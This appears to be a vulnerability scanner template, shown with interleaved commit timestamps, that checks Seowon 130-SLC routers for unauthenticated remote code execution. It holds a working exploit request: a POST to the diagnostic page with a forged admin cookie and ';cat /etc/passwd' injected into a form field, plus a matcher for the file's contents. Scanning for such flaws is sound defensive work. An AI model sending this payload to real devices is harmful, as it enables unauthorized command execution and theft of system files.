2021-11-07 05:39:06 +00:00
id : seowon-router-rce
info :
2021-11-13 17:31:53 +00:00
name : Seowon 130-SLC router - Remote Code Execution
2021-11-07 05:39:06 +00:00
author : gy741
severity : critical
2022-05-31 09:10:43 +00:00
description : |
Seowon 130-SLC router lets remote attackers execute commands without authentication as admin users via the router ip & Port(if available) in the request.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/50295
2022-05-30 16:21:04 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-08-27 04:41:18 +00:00
tags : unauth,iot,edb,rce,seowon,router
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-11-07 05:39:06 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-07 05:39:06 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-11-08 07:19:37 +00:00
Referer : {{BaseURL}}/diagnostic.html?t=201701020919
2021-11-07 05:39:06 +00:00
Cookie : product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
2021-11-08 07:13:14 +00:00
2021-11-07 05:39:06 +00:00
Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
matchers-condition : and
matchers :
- type : regex
2021-11-08 10:15:54 +00:00
part : body
2021-11-07 05:39:06 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-11-07 05:39:06 +00:00
- type : status
status :
- 200